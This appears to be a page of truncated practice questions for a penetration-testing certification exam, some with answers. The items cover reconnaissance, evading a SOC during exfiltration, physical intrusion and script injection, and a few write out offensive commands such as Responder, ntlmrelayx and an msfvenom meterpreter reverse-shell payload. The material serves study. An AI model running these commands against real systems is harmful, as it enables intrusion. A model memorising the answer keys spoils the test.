Which of the following risks should the tester use to leverage an attack as the next step in the security assessment?
While conducting a reconnaissance activity, a penetration tester extracts the following information:
Emails:
- [email protected]
- [email protected]
- [email protected]
Which of the following risks should the tester use to leverage an attack as the next step in the security assessment?
A. Unauthorized access to the network
B. Exposure of sensitive...
Which of the following would be most appropriate to avoid alerting the SOC?
A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?
A. Apply UTF-8 to the data and send over a tunnel to TCP port 25.
B. Apply...
Which of the following resources would most likely identify hardware and software being utilized by the client?
A penetration tester plans to conduct reconnaissance during an engagement using readily available resources. Which of the following resources would most likely identify hardware and software being utilized by the client?
A. Cryptographic flaws
B. Protocol scanning
C. Cached pages
D. Job boards
Answer: D
Explanation: To conduct reconnaissance and...
Which of the following techniques would the penetration tester most likely use to access the sensitive data?
As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands. Which of the following techniques would the penetration tester most likely use to access the sensitive data?
A. Logic bomb
B. SQL injection
C. Brute-force...
Which of the following is the best attack plan for the tester to use in order to gain access to the facility?
A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to...
Which of the following would most likely accomplish this goal?
A penetration tester needs to collect information over the network for further steps in an internal assessment. Which of the following would most likely accomplish this goal?
A. ntlmrelayx.py -t 192.168.1.0/24 -1 1234
B. nc -tulpn 1234 192.168.1.2
C. responder.py -I eth0 -wP
D. crackmapexec smb 192.168.1.0/24
Answer: C
Explanation:...
Which of the following commands would most likely be used by the tester to continue with the attack on the host?
A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would...
Which of the following frameworks is the tester using?
A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the tester using?
A. OWASP MASVS
B. OSSTMM
C. MITRE ATT&CK
D. CREST
Answer: B
Explanation: The OSSTMM (Open Source Security...
Which of the following should the tester do to fix the error?
A penetration tester writes the following script to enumerate a /24 network:
    #!/bin/bash
    for i in {1..254}; do
    ping -c1 192.168.1.$i
    done
The tester executes the script, but it fails with the following error:
    -bash: syntax error near unexpected token `ping'
Which of the following should...
Which of the following types of attacks is this an example of?
During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward. Which of the following types of attacks is this an example...